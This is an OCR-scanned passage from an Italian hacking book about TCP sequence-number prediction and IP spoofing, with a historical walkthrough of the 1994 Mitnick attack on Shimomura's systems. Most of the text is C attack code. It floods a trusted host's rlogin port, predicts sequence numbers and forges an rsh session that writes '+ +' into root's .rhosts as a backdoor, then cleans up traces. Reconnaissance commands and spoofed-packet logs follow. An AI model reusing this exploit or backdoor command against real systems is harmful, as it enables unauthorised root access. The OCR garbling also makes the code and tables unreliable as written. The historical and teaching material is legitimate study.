if ( (trustedaddr . sin_addr. s_addr = inet_addr (argv [1] ) ) == -1) { 
if ( (host = gethostbyname (argv[l] ) ) == NULL) { 
printf ( "Unknown host %s . \n" , argv [1] ) ; 
exit (1) ; 

} 

trustedaddr . sin_ fami ly = host->h_addrtype ; 

memepy ( (caddr_t) Strustedaddr . sin_addr, host->h_addr , host- 

>h_length) ; 
} 

printf ( "Trusted is %s\n ", inet_ntoa (trustedaddr . sin_addr . s_addr) ) ; 
memepy (&trusted, (char *) Strustedaddr . sin_addr. s_addr, 4) ; 

memset (Saddr, 0, sizeof (addr) ) ; 
addr . sin_family = AF_INET; 

if ( (addr . sin_addr . s_addr = inet_addr (argv [2] ) ) == -1) { 
if ((host = gethostbyname (argv [2] ) ) == NULL) { 
printf ( "Unknown host %s . \n" , argv [2] ) ; 
exit (1) ; 

} 

addr . sin_ fami ly = host->h_addrtype; 

memepy ( (caddr_t) Saddr. sin_addr, host->h_addr, host->h_length) ; 

} 

printf ("Target is %s\n" , inet_ntoa (addr . sin_addr . s_addr) ) ; 
memepy ( Sdest , ( char *) Saddr . sin_addr . s_addr, 4) ; 

if ((ree = socket (AF_INET, SOCK_RAW, IPPROTO_TCP) ) < 0) { 
perror ("errori recv socket") ; 
exit(l); 

} 

if ((sen = socket (AF_INET , SOCK_RAW, IPPROTO_RAW) ) < 0) { 
perror ("error: send socket") ; 
exit (1) ; 

} 

tiifdef IP_HDRINCL 

fprintf (stderr, "IP_HDRINCL is set\n"); 

if (setsockopt (sen, IPPROTO_IP, IP_HDRINCL, (char *) &i, sizeof (i) ) < 0) { 
perror ( "setsockopt IP_HDRINCL ") ; 
exit (1) ; 

}; 

iendif 
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if ( (host=gethostbyname (buf) ) ==NULL) { 

fprintf (stderr, "Can't get my hostname ! ?\n" ) ; 
exlt(l); 

ì 

memcpy (&src, host->h_addr , 4) ; 
bogusaddr . sln_famlly = AF_INET; 

bogusaddr . s±n_addr . s_addr = lnet_addr (bogusname) ; 
memcpy ( &bogus, ( char *) Sbogusaddr . s±n_addr . s_addr, 4) ; 
hose_trusted (sen,bogus, trusted, &bogusaddr, seq_num, port_num) ; 
determlne_sequence (sen, ree, sre, dest, &addr, &nseq, Soffset); 
pr±ntf("Next sequence number Is : %u, offset is : %u\n" , nseq, offset); 
spoof (sen, trusted, dest, Strustedaddr, nseq) ; 

reset_trusted (sen,bogus, trusted, Sbogusaddr, seq_num, port_num) ; 

} 



Ogni computer connesso ad una rete TCP/IP durante una comunicazione allega al propio 
pacchetto l'indirizzo IP di comunicazione e un numero univoco chiamato numero di sequenza. 
L'hacker esegue l'attacco a previsione del numero di sequenza TCP/IP in due fasi. 
Nella prima fase l'hacker cerca di determinare l'indirizzo IP del server, generalmente 
mettendosi in ascolto dei pacchetti Internet, provando a specificare in ordine vari numeri di 
host oppure connetendosi al sito mediante un browser Web e osservando l'indirizzo IP nella 
barra di stato (attraverso il comando nslookup si può avere la traduzione dagli indirizzi IP 
numerici a quelli a stringa e viceversa). 

Ad esempio, se un sistema ha l'indirizzo IP 192.0.0.1 5, l'hacker, sapendo che in una rete C vi 
possono essere fino a 256 computer, potrà cercare di indovinare i loro indirizzi modificando 
unicamente l'ultimo byte. 

Dopo che l'hacker avrà iniziato a trovare gli indirizzi della rete, inizierà anche a controllare i 
numeri di sequenza dei pacchetti che si trasmettono tali computer. 

Dopo aver monitorizzato le trasmissioni della rete, l'hacker cercherà di prevedere il prossimo 
numero di sequenza che verrà generato dal server e quindi fornirà un proprio pacchetto con 
tale numero di sequenza inserendosi fra il server e l'utente. 

Poiché l'hacker ha già l'indirizzo IP del server, può in realtà generare pacchetti con i numeri di 
sequenza corretti e indirizzi IP che gli consentono di intercettare le trasmissioni con l'utente. 
Dopo che l'hacker ha avuto accesso al sistema tramite questo attacco, può accedere alle 
informazioni che il sistema di comunicazione trasmette al server, inclusi file di password, nomi 
di login,dati riservati ed ogni altra informazione trasmessa in rete. In genere questo attacco 
viene usato come base per l'attacco di un altro server della rete. 

Nel capitolo seguente vedremo questo attacco dal punto di vista pratico riportando quello che 
fu un attacco storico mediante questa metodologia. 

Dobbiamo stare attenti quando parliamo di cose storiche in quanto la realtà dei nostri giorni 
potrebbe essere leggeremente differente e non solo leggermente. 

Questo protocollo viene usato per stabilire connessioni bidirezionali via rete, e per trasferire 
quantità di dati elevati attraverso anche a protocolli di livello applicazioni come telnet, http, ftp. 
TCP a differenza degli altri protocolli della suite come ICMP o UDP, stabilisce una 
connessione reale fra le parti che devono comunicare; una volta stabilita la connessione, 
vengono trasmessi dati che verranno successivamente confermati attraverso numeri di 
sequenza costruiti nel seguente modo: 

Nella fase iniziale della connessione (handshake) il client contatta il server e gli propone un 
suo numero di sequenza, il server risponde con un ack sul numero di sequenza appena 
ricevuto e propone un suo numero di sequenza iniziale, che verrà successivamente 
confermato dal client: 
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Connessione 


TCP HANDSHAKE 


client 


server 


1 1 SYN (SEQ= 


x) 1 1 




> / / 


1 1 SYN (SEQ= 


y, ACK= x+1) 1 1 


j i < 




/ / SYN (SEQ= 


x+1, ACK= y+1) 1 1 





Ricordiamoci che TCP è un protocollo sliding Windows, o in italiano a finestra rotante, come lo 
era, per quelli che si ricordano i vecchi BBS, un protocollo come Zmodem. 
Ogni pacchetto TCP contiene un numero di sequenza (primo byte) e un numero di 
acknowledgment (ultimo byte. 

Questo sistema dello sliding Windows è stato implementato per rendere il protocollo più 
efficiente. 



FLOOD 




ACK, SYN 



Il discorso dell'efficienza è legato a diversi fattori anche se quello più importante è dato dal 
fatto che i protocolli di questo tipo utilizzano la banda in un modo più efficiente, dato che 
viene permessa la trasmissione di più pacchetti prima che venga richiesto l'acknowledgment. 
I numeri di sequenza successivi a quelli della connessione vengono costruiti in base ai byte 
ricevuti, ovvero se ho ricevuto 13 byte, il prossimo numero di sequenza sarà la somma del 
numero di sequenza precedente più il numero di byte ricevuti + 1 ( seq= seq_prec + 13 + 1 ). 
Abbiamo visto che il numero di sequenza iniziale è contenuto nel primo pacchetto che ha 
attivo il flag SYN, che indica l'inizio di una connessione TCP; altri flag utilizzati nel protocollo 
TCP sono PUSH, che indica al protocollo TCP di inviare i dati immediatamente senza 
aspettare altri dati; abbiamo poi il flag RESET, che indica di resettare la connessione 
immdiatamente e infine il flag FIN che indica la fine della connessione. Inoltre bisogna tener 
conto che dopo un certo tempo che il messaggio viene spedito e non si ha riscontro, allora 
viene ritrasmesso, quindi ad ogni trasmissione viene associato un timer; inoltre quando una 
macchina riceve un pacchetto ritrasmette indietro un riscontro per l'avvenuta ricezione. 
Un altro sorgente indirizzato al'individuazione del numero di sequenza è il seguente : 

/* This source is subject to the GNU PUBLIC LICENSE. It can be used freely 
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* Information must remain intact . For commercial purposes, you MUST contact 

* us to obtain a license for it ' s use. A copy of the GNU PUBLIC LICENSE is 

* available from: ftp://aeneas.mit.edu/pub/gnu/ 
* 

* This program is distributed in the hope that it will be useful, 

* but WITHOUT ANY WARRANTY; without even the implied warranty of 

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE . See the 

* GNU General Public License for more details . 
* 

* Mike Neuman 

* En Garde Systems 

* 525 Clara Avenue, Suite 202 

* St. Louis, MO 63112 

* mcn@EnGarde.com 
*/ 



iinclude <stdio.h> 
iinclude <setjmp . h> 
iinclude <signal . h> 
iinclude <sys/types.h> 
iinclude <sys/socket . h> 
iinclude <netinet/in_systm.h> 
iinclude <netinet/in . h> 
iinclude <net/if.h> 
iinclude <netinet/if_ether.h> 
iinclude <netinet/ip.h> 
iinclude <netinet/tcp.h> 
iinclude <errno.h> 
iinclude <netdb.h> 



iinclude "ipbpf.h" /* Include ipbpf header */ 

idefine BADHOST "16.17.18.19" 

/* The host to spoof flooding the trusted 

* host ' s destination port from. This host shouldn't exist, but should 
have 

* correct routing entries . The important part is so that returned packets 

* go to nowhere. 
*/ 

idefine NUMSEQUENCE 80 

/* The number of connections to spoof from BADHOST . I made this big. 

* I've found 4 . 4BSD will be flooded with only 8 unacked connections. Your 

* mileage may vary 
*/ 

idefine NUMTESTS 10 

/* How many samples of the sequence number s do you want to take? 

* I randomly picked 10 and only take the last result . If I wanted to be 

* elegant, I'd do some sort of statistical average. Sequence numbers 

* are generally updated by a fixed number, this attempts to compute 

* this number taking into account average network lag. Fixed sequence 

* number updating currently works on: Solaris 2.x, NeXTstep, 4.4BSD, and 

* probably others, although I haven't tested them. 
*/ 



idefine ROUTER "router.EnGarde.com" 

/* The name of your router to the outside world. Spoofed packets need to 

* be sent to it ' s ether/fddi address in order to get to the outside 
world. 

*/ 



main (argc, argv) 
int argc; 
char *argv[]; 



{ 
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u_long trust_addr, targ_addr; 

u_long seq_n um [NUMSEQUENCE ] , port_num [NUMSEQUENCE ] ; 
u_long next_seq, offset; 

If (argc!=3) { 

fprintf (stderr, "Usage: %s trusted-host target\n" , argv[0] ) ; 
exit(l); 

} 

if ( (he=gethostbyname (argv[ 1] ) ) ==NULL) { 
trust_addr=inet_addr (argv [1 ] ) ; 
if (trust_addr== (u_long) -1) { 

fprintf (stderr, "Unknown host %s\n", argv[l]); 

exit (1) ; 

} 

} else 

bcopy (he->h_addr , &trust_addr, 4); 

if ( (he=gethostbyname (argv [2] ) ) ==NULL) { 
targ_addr=inet_addr (argv[ 2] ) ; 
if (targ_addr== (u_long) -1) { 

fprintf (stderr, "Unknown host %s\n", argv[2] ) ; 

exit (1) ; 

ì 

} else 

bcopy (he->h_addr, &targ_addr, 4); 
printf ( "Initializing Packet Filter\n") ; 

use_best () ; /* Use the best packet filter available on this system */ 

if (init_filter("tcp", NULL) ) { 

/* Initialize the packet filter and read only TCP packets */ 
fprintf (stderr , "Can't init Packet Filter\n") ; 
exit (1) ; 

} 

/* First, send NUMSEQUENCE connection requests from BAD HOST to the 

* trusted host on a trusted port (currently 513) . Trusted host will 

* attempt to SYN-ACK these. If BADHOST doesn't exist, there will 

never 

* be a response ACK. Consequently, trusted host ' s connection queue 

will 

* fili and it will no longer respond to any packets to port 513. 
*/ 

printf (" [Hosing Trusted Host . . . ] \n" ) ; 

if (hose_trusted (argv[l] , trust_addr, seq_num, port_num) ) { 
fprintf (stderr, "Couldn't hose %s\n", argv[l]); 
exit(l); 

ì 

/* Next, do a sampling of the difference in sequence numbers . These 
packets 

* are NOT spoofed as receiving the reply is required. Consequently, 

this 

* host can appear in any packet traces . 
*/ 

printf (" [Determining sequence numbers ...] \n" ) ; 

if (determine_sequence (argv [2] , targ_addr, &next_seq, Soffset)) { 

fprintf (stderr, "Couldn't determine sequence numbers for %s\n", 

argv [2]), ■ 

exit(l); 

} 

printf ( "=>Next sequence number is : %u, offset is : %u\n", next_seq, 
offset) ; 

/* Next, do the actual spoofed connection, now that we know what the 

next 
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*/ 

prlntf ( " [Spoofing Connection . . . ] \n ") ; 

if (spoof_connect±on (trust_addr, argv[2] , ta.rg_a.ddr, next_seq) ) { 

fprintf (stderr, "Couldn't spoof connection to %s\n", argv[l] ) ; 
exit(l); 

ì 

/* Finally, reset ali of the half started connections on trusted-host . 

* This will put trusted-host back into it ' s normal state (and hide 

* the traces that it was used for evil . 
*/ 

printf ( " [Cleaning Up Trusted Mess . . . ] \n" ) ; 

if (reset_trusted(argv[l] , trust_addr, seq_num, port_num) ) { 

fprintf (stderr, "Couldn't reset %s . Sucks to be it.\n", 

argv[l]); 

exit(l); 

ì 



/* fin */ 
exit (0) ; 



hose_trusted(trust_host, trust_addr, seq_num, port_num) 

char *trust_host; 

u_long trust_addr; 

u_long seq_num [NUMSEQUENCE ] ; 

u_short port_num [NUMSEQUENCE] ; 

{ 

int i; 

u_long start_seq=49358353+getpid () ; /* Make this anything you want */ 
u_long start _port=600; /* Make this anything you want */ 
struct ether_header eh; 
u_long bad_addr; 

/* First attempt to find the hardware address of the trusted host */ 

if (ether_hostton (trust_host, Seh . ether_dhost) ) ( 

/* If that fails, find the hardware address of the router */ 
if (ether_hostton (ROUTER, &eh . ether_dhost) ) { 

fprintf (stderr, "Can't determine ether addr of trusted 

host or router. \n") ; 

return (1) ; 

} 

} 

eh . ether_type=ETHERTYPE_IP; 

if ( (bad_addr=inet_addr (BADHOST) ) == (u_long) -1 ) { 

fprintf (stderr, "Can't convert BADHOST address . \n" ) ; 
return (1) ; 

} 

/* Send a whole bunch of spoof ed SYNs . Arguments to 
sendtcppacket_simple 

* are: 

* sendtcppacket_simple ( 



* 


struct ether_ 


addr 


source_hardware_address , 


* 


struct ether_ 


addr 


destination_hardware_address , 


* 


u_long 




source_ip_address , 


* 


u_long 




destination_ip_address, 


* 


u_short 




source_port , 


* 


u_short 




destination _port, 


* 


u_long 




sequence_number, 


* 


u_long 




acknowldegement_number, 


* 


int 




TCP flags (SYN, RST, ACK, PUSH, FIN), 


* 


char * 




data, 


* 


int 




datalen) 


*/ 
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port_num[±] =start _port++; /* record the ports and sequence 

numbers */ 

seq_num[l] =start_seq++; /* for later resetlng */ 

sendtcppacket_slmple (& (eh . ether_shost) , & (eh. ether_dhost) , 
bad_addr, trust_addr, 

port_num[l], 513, /* 513 is rlogln/rsh port */ 
seq_num, 0, 
TH_SYN, NULL, 0) ; 

ì 

return (0) ; 

} 

jmp_buf env; 

vold tlmedout () 
{ 

longjmp (env, 1) ; 

} 

determ±ne_sequence (targ_host, targ_addr, next_seq, offset) 
char *targ_host; 

u_long targ_addr, *next_seq, *offset; 
{ 

struct hostent *he; 

struct ether_header eh, eh2; 

struct ip Iph; 

struct tcphdr tcph; 

int 1; 

u_long start_seq=4138353+getp±d() ; /* Make thls anythlng you want */ 
u_long start _port=600; /* Make this anything you want */ 

u_long my_addr; 
char buf[80]; 

u_long prev_seq=0 , dlff=0; 
*offset=0; 

/* first attempt to get the destination ' s hardware address */ 

if (ether_hostton (targ_host, &eh . ether_dhost) ) { 

/* If that fails, get the router's hardware address */ 
if (ether_hostton (ROUTER, &eh . ether_dhost) ) { 

fprintf (stderr, "Can't determine ether addr of trusted 

host or router.\n"); 

return (1) ; 

} 

} 

eh . ether_type=ETHERTYPE_IP; 
gethostname (buf, 79) ; 

if ( (he=gethostbyname (buf) ) ==NULL) { 

fprintf (stderr, "Can't get my hostname ! ?\n" ) ; 
return (1) ; 

} 

bcopy (he->h_addr , &my_addr, 4) ; 
for (i=0; i<NUMTESTS; i++) { 

/* Do a setjmp here for timeouts */ 

if (setjmp(env)) 

fprintf (stderr, "Response Timed out . . . Resending. . . \n") ; 

signal (SIGALRM, timedout) ; 

alarm ( 0) ; 

alarm(lO) ; /* Wait 10 seconds for reply */ 
sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 
my_addr, targ_addr, 

start_port, 514, /* 514 is rsh port */ 
start_seq, 0, 
TH_SYN, NULL, 0) ; 
/* Send connection reguest packet */ 

for (;;) ( 
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readpacket 



NULL) ! = 

isn 't 

sequence . 
then takes 
work well 



prev_seq, 



old=%u, new=%u\n" , 



/* Wait until the reply is received. Arguments for 

* are: 

* readpacket ( 

* struct fdd±_header fddi_header , 

* struct ether_header ether_header , 

* struct ip ±p_header, 

* struct udphdr udp_header, 

* struct tcphdr tcp_header, 

* char * data, 

* int datalen) 
* 

* return type Is the type of packet read 
*/ 

whlle (readpacket (NULL, &eh2, &±ph, NULL, &tcph, NULL, 

PTYPE_IP_TCP) ; 
if (ntohs (tcph.th_dport)==start_port SS 
ntohs (tcph . th_sport) ==514) { 

/* If the ports match, it 's probably a reply — this 

* definite, Jbut it ' s a pretty good guess . 

* The following attempts to generate a reliable 

* Actually, it 's pretty dumb. It tries 10 times, 

* the last result . Generally, I've found this to 

* enough to warrant not writing anything smarter. 



S (eh. ether_dhost) , 



Note, this 
unless 
you 've 
routine. 



*/ 



if (prev_seq) { 

diff=tcph . th_seq-prev_seq; 

printf(" (prev=%u, new=%u, diff=%u\n", 

tcph . th_seq, diff) ; 

} else 

diff=0; 
if (*offset==0) 

*offset=diff; 

else { 

if (*offset!=diff) 

pr int f ("Diff erence in Offset: 

*offset, diff); 

*offset=diff; 

} 

prev_seq=tcph . th_seq; 
sendtcppacket_simple ( 

S (eh. ether_shost) , 

my_addr, targ_addr, 
start_port++, 514, 
start_seq++, 0, 
TH_RST, NULL, 0) ; 
/* Send a reset to dose the connection . 

* automatically will be sent by localhost 

* a service is listening on whatever port 

* chosen to start with at the top of this 

* so I reset it anyway 
*/ 

break; /* out of infinite for */ 
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alanti ( 0) ; 
} /* for 1=0 ±<numtests . . . */ 
*next_seq=prev_seq+*offset; 
return (0) ; 

} 

spoof_connect±on (trust_addr, targ_host, targ_addr, next_seq) 

u_long trust_addr , targ_addr , next_seq; 

{ 

struct ether_header eh; 
char buf[80]; 
struct hostent *he; 
u_long my_addr; 
u_short port=513; 

char *string="0\Oroot\Oroot\Oecho + + »/ . rhosts\0" ; 
Int strlnglen=32 ; 
u_long seq=385773357 ; 
int i; 

/* As before, get the target ' s hardware address */ 

if (ether_hostton (targ_host, &eh . ether_dhost) ) { 

/* If that fails, get the router's hardware address */ 
if (ether_hostton (ROUTER, &eh . ether_dhost) ) { 

fprintf (stderr, "Can't determine etheraddr of target host 

or router.\n"); 

return (1) ; 

} 

ì 

eh . ether_type=ETHERTYPE_IP; 

/* Send a syn with our own sequence number */ 
sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 

trust_addr, targ_addr, 

port, 514, 

seq++, 0, 

TH_SYN, NULL, 0) ; 
usleep (5000) ; /* wait for the other side to SYN,ACK */ 

/* Send the ACK for the sequence number we guessed. I've found we 

guess 

* right about 90% of the time 
*/ 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 
trust_addr, targ_addr, 
port, 514, 
seq, ++next_seq, 
TH_ACK, NULL, 0) ; 

/* Now, send our rsh request with the proper sequence and ACK nubmers 

*/ 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 

trust_addr, targ_addr, 

port, 514, 

seq, next_seq, 

TH_ACK, string, stringlen) ; 
seq+=stringlen; 

sleep (1) ; /* Wait for it to be received, ACKd, and processed */ 
/* Send a fin with the our new sequence number and their sequence 
number */ 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 
trust_addr, targ_addr, 
port, 514, 
seq, next_seq, 
TH_FIN, NULL, 0) ; 
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the remote 
could 



/* If we screwed up the guessing the correct sequence number 

* host is uslng, guess a whole bunch more just to be sure. We 

* probably reset the connection, but it ' s better to have the 

* net software hang waiting for a proper FIN/ACK than have the 

* application that we've spoofed into mnning exit because we 

* reset the connection . 
*/ 

sleep (2) ; 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 
trust_addr, targ_addr , 
port, 514, 
seq+1, next_seq+i, 
TH_ACK, NULL, 0) ; 



} 



usleep (50000) ; /* Finally, send a RST */ 

/* Now, if we're really screwed, and ~8 seconds later we haven't 
guessed 

* the right sequence number, just reset the connection. Hopefully by 

now 

* the application has done it's job, so resetting shouldn't cause any 

* problems . 
*/ 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 
trust_addr, targ_addr, 
port, 514, 
seq+1, next_seq+4, 
TH_RST, NULL, 0) ; 



return (0) ; 



} 



reset_trusted(trust_host, trust_addr, seq_num, port_num) 
u_long trust_addr ; 

u_long seq_n um [NUMSEQUENCE ] , port_num [NUMSEQUENCE] ; 
{ 

struct ether_header eh; 
u_long bad_addr; 
int i; 

if (ether_hostton (trust_host, Seh . ether_dhost) ) { 

if (ether_hostton (ROUTER, &eh.ether_dhost) ) { 

fprintf (stderr, "Can't determine ether addr of trusted 

host or router.\n"); 

return (1) ; 

} 

ì 

eh . ether_type=ETHERTYPE_IP ; 

if ( (bad_addr=inet_addr (BADHOST) ) == (u_long) -1 ) { 

fprintf (stderr, "Can't convert BADHOST address . \n" ) ; 
return (1) ; 

} 

/* Reset ali of the connections we started before */ 
for (i=0; KNUMSEQUENCE ; i++) { 

sendtcppacket_simple (& (eh . ether_shost) , & (eh . ether_dhost) , 

bad_addr, trust_addr , 

port_num[i], 513, 

seq_num[i], 0, 

TH_RST, NULL, 0) ; 

} 

return (0) ; 
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La rappresentazione grafica dei tre pacchetti TCP necessari per instaurare una connessione 
è la seguente : 



Pacchetto 


1: 


Direzione: Client > Server 










Flag Attivi: SYN 










Sequence number: X (numero generato 


dal 


client) 


Pacchetto 


2: 


Direzione : Server > Client 










Flag Attivi: SYN, ACK 










Sequence number: Y (numero generato 


dal 


server) 






Acknowledgement number: X + 1 






Pacchetto 


3: 


Direzione : Client > Server 










Flag Attivi: ACK 










Sequence number: X + 1 










Acknowledgement number: Y + 1 







Dopo questo breve scenario di background culturale sul TCP/IP, passiamo alla descrizione 
dell'attacco di Mitnick, allora innanzitutto 



Un caso famoso di I P Spoof ing 

Questo attacco rappresenta la più grave minaccia per i server connessi a Internet. 
Anche se presenta analogie con l'attacco al numero di sequenza, questo attacco ottiene 
l'accesso alla rete costringendo la rete ad accettare il suo indirizzo IP come se fosse un 
indirizzo fidato e dunque l'hacker non è costretto a provare indirizzi IP per trovare quello 
giusto. L'idea dell'attacco è che l'hacker acquisisce il controllo di un computer che si collega 
con la rete che rappresenta il suo obbiettivo. 

Poi disconnette il computer dalla rete e inganna il server sostituendosi a tale computer. 
Dopo che l'hacker si è sostiuito al computer disconnesso, sostituisce l'indirizzo IP all'interno di 
ogni pacchetto con il propio indirizzo IP (della vittima)e altera i numeri di sequenza. 
Utilizzando l'IP sostituito, un hacker simula con il proprio computer l'indirizzo IP di un sistema 
fidato, dopo che l'hacker ha ingannato il computer di destinazione, utilizza un apposito 
numero di sequenza per diventare la nuova destinazione del server. 

Questo attacco permette di aggirare i sistemi di password monouso e pertanto può 
compromettere un host dotato di elevati livelli di sicurezza, aggirando il sistema delle 
password l'hacker può penetrare in un sistema operativo diverso dal propio. 
In questo capitolo vedremo di definire la natura di questa tipologia di attacco dando un 
occhiata a quello che è stato l'attacco remoto del mitico Kevin Mitnick's sui sistemi di 
Tsutomu Shimomura's. 

Quest'utlimo è uno degli esperti di sicurezza di reti più famosi come allo stesso modo Kevin è 
sicuramente dall'altra parte il più famoso hacker esistente anche per la pena esemplare a cui 
venne condannato proprio per le sue azioni d'intrusione all'interno di sistemi informatici. 
Vengono utilizzati due differenti meccanismi e precisamente un IP source address spoofing e 
un sistema indirizzato alla predizione del numero di sequenza TCP. 

Dentro a quest'esempio sono inclusi dei logs che sono soltanto degli spezzoni dei risultati 
mostrati da TCPDUMP che Tsutomu aveva in funzione sui suoi sistemi. 
Infatti proprio grazie a questo riuscì a ricostruire l'attacco. 

Alcune informazioni sono state omesse per chiarezza al fine di non confondere le idee. 
La tecnica viene anche conosciuta con il termine di SYN flooding ovvero è in pratica la 
manipolazione dei segnali scambiati dal protocollo nell'ambito di una fase atta a stabilire una 
connessione. 

L'attacco IP spoofing partì alle 14:09:32 PST del 12/25/94 e fu indirizzato verso una stazione 
X-terminal costituita da una SPARC Station con Solaris come sistem operativo. 
La prima indagine partì da una account con privilegio di root su un sistema di toad.com, dal 
quale proviene il seguente log. 

14:09:32 toad.com# finger -1 @target 
14:10:21 toad.com# finger -1 Qserver 
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14:10:50 toad.comft finger -1 rootQserver 
14:11:07 toad.comft finger -1 @x-terminal 
14:11:38 toad.comft showmount -e x-terminal 
14:11:49 toad.comtf rpcinfo -p x-terminal 
14:12:05 toad.comft finger -1 root@x-terminal 

L' scopo apparente di questa indagine era quello di determinare se esistevano delle relazioni 

trust all'interno dei sistemi che possano essere attaccati con un IP spoofing attack. 

Come abbiamo già visto in altri capitoli le funzioni di fingeprinting eseguite su dei sistemi 

hanno come scopo quello di ritornare la maggior quantità possibile di informazioni su un 

account. 

Una funzione di finger eseguite come client emette una query verso un host utilizzando il 
protocollo finger per vedere se un utente è loggato sul sistema. 

In altre parole, come abbiamo già detto, la funzione di finger riporta lo username di un target, 
la data a dell'ultimo login, la directory home e tutte le altre informazioni legate all'utente 
stesso. 

I comandi showmount e rpcinfo necessitano dei permessi di root per la loro attivazione sulla 
macchina attaccante. 

Ad esempio il comando showmount mostra se un sistema condivide delle directory 
utilizzando NFS: 

showmount -e host 



Se esistono directory condivise queste verranno listate: 



/home hostl host2 host3 




Questo esempio mostra quello che può' risultare dall'esecuzione del comando showmount, 
ovvero una serie di directory (2 in questo case, home e usr) seguite dal nome degli host che 
possono accedere a queste risorse. Come si intuisce, queste directory possono essere 
montate solo dai sistemi elencati (hostl ,host2,host3). Ma se al posto di hostl ,host2,host3 ci 
fosse stato everyone, allora le due directory sarebbero state leggibili da chiunque... 

Per esempio: 

showmount -e search.websitek.com 
/home everyone 




Se ad esempio vedessimo, come nel caso precedente, che il sistema esporta delle directory, 
potremmo usare queste per eseguire un mount con: 

mount search.websitek.com:/home /mnt 



Finger invia la query al server il quale processa l'output e termina la connessione. 
L'output ricevuto dalla porta 79 riporta le informazioni dell'utente. 

Il secondo comando mostrato nello stralcio di log è showmount con l'opzione -e il quale è 
normalmente utilizzato per mostrare come un file system NFS esporta il suo file systems. 
Il comando funziona anche da remoto su di una rete. 
Il comando rpcinfo con l'opzione -p è una query relativa al portmap. 

Il daemon relativo a portmap converte il numero del programma RPC in una numero di porta. 
Circa sei minuti dopo iniziamo a vedere un flusso di TCP SYNs (le richieste iniziali di 
connessione) dal 130.92.6.97 verso la porta 513 (login) del server. 

Generalmente i segnali SYN sono destinati a comunicare a uno dei sistemi connessi 
l'intenzione di richiedere l'inizio di una comunicazione. 

Lo scopo di questi SYNs accodati sulla porta 513 del server con una connessione "half open" 
è quello di non permettere di rispondere ad eventuali nuove richieste di connessione. 
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In altre parole si tratta di una tecnica DOS per portare il sistema vittima ad essere bloccato. 
Il concetto di "naif open" sta nel fatto che l'handshake viene eseguito in modo tale che la 
connessione di fatto non sia mai completata. 

Un attaccante generalmente invia numerosi SYN per allacciarsi a delle risorse sul sistema di 
destinazione. 

Dopo aver ricevuto queste richieste di connessione, il server bersaglio alloca risorse per 
gestire e tracciare la nuova sessione di comunicazione e quindi risponde con dei SYN-ACK. 
In questo caso la risposta è inviata ad un indirizzo spoofed e quindi non esistente. 
Questo significa che questo IP non risponderà a nessuna richiesta di nuova connessione. 
In particolar modo, questo non genererà TCP RSTs in risposta a SYN-ACKs non attesi. 
Allo stesso modo per cui la porta 513 è una porta privilegiata, server. login può essere 
tranquillamente utilizzata come sorgente per un attacco di address spoofing su un "r- 
services" di UNIX (rsh, rlogin). 

L'indirizzo 130.92.6.97 è un indirizzo casuale (forged) (uno di quelli che non generano 
nessuna risposta ai pacchetti inviategli): 



14 


18 


22 


516699 


130 


92 


6 


97. 


600 


> 


server 


login : 


S 


1382726960 


1382726960 (0) 


win 


4096 


14 


18 


22 


566069 


130 


92 


6 


97. 


601 


> 


server 


login : 


S 


1382726961 


1382726961 (0) 


win 


4096 


14 


18 


22 


744477 


130 


92 


6 


97. 


602 


> 


server 


login : 


S 


1382726962 


1382726962 (0) 


win 


4096 


14 


18 


22 


830111 


130 


92 


6 


97. 


603 


> 


server 


login : 


S 


1382726963 


1382726963 (0) 


win 


4096 


14 


18 


22 


886128 


130 


92 


6 


97. 


604 


> 


server 


login : 


S 


1382726964 


1382726964 (0) 


win 


4096 


14 


18 


22 


943514 


130 


92 


6 


97. 


605 


> 


server 


login : 


S 


1382726965 


1382726965 (0) 


win 


4096 


14 


18 


23 


002715 


130 


92 


6 


97. 


606 


> 


server 


login : 


S 


1382726966 


1382726966(0) 


win 


4096 


14 


18 


23 


103275 


130 


92 


6 


97. 


607 


> 


server 


login : 


S 


1382726967 


1382726967 (0) 


win 


4096 


14 


18 


23 


162781 


130 


92 


6 


97. 


608 


> 


server 


login : 


S 


1382726968 


1382726968(0) 


win 


4096 


14 


18 


23 


225384 


130 


92 


6 


97. 


609 


> 


server 


login : 


S 


1382726969 


1382726969(0) 


win 


4096 


14 


18 


23 


282625 


130 


92 


6 


97. 


610 


> 


server 


login : 


s 


1382726970 


1382726970(0) 


win 


4096 


14 


18 


23 


342657 


130 


92 


6 


97. 


611 


> 


server 


login : 


s 


1382726971 


1382726971 (0) 


win 


4096 


14 


18 


23 


403083 


130 


92 


6 


97. 


612 


> 


server 


login : 


s 


1382726972 


1382726972 (0) 


win 


4096 


14 


18 


23 


903700 


130. 


92 


6. 


97. 


613 


> 


server 


login : 


s 


1382726973 


1382726973 (0) 


win 


4096 


14 


18 


24 


003252 


130 


92 


6 


97. 


614 


> 


server 


login : 


s 


1382726974 


1382726974 (0) 


win 


4096 


14 


18 


24 


084827 


130 


92 


6 


97. 


615 


> 


server 


login : 


s 


1382726975 


1382726975 (0) 


win 


4096 


14 


18 


24 


142774 


130. 


92. 


6. 


97. 


616 


> 


server 


login : 


s 


1382726976 


1382726976 (0) 


win 


4096 


14 


18 


24 


203195 


130 


92 


6 


97. 


617 


> 


server 


login : 


s 


1382726977 


1382726977 (0) 


win 


4096 


14 


18 


24 


294773 


130 


92 


6 


97. 


618 


> 


server 


login : 


s 


1382726978 


1382726978 (0) 


win 


4096 


14 


18 


24 


382841 


130 


92. 


6. 


97. 


619 


> 


server 


login : 


s 


1382726979 


1382726979 (0) 


win 


4096 


14 


18 


24 


443309 


130 


92 


6 


97. 


620 


> 


server 


login : 


s 


1382726980 


1382726980 (0) 


win 


4096 


14 


18 


24 


643249 


130 


92 


6 


97. 


621 


> 


server 


login : 


s 


1382726981 


1382726981 (0) 


win 


4096 


14 


18 


24 


906546 


130 


92 


6. 


97. 


622 


> 


server . 


login : 


s 


1382726982. 


1382726982 (0) 


win 


4096 


14 


18 


24 


963768 


130 


92 


6 


97. 


623 


> 


server 


login : 


s 


1382726983 


1382726983 (0) 


win 


4096 


14 


18 


25 


022853 


130 


92 


6 


97. 


624 


> 


server 


login : 


s 


1382726984 


1382726984 (0) 


win 


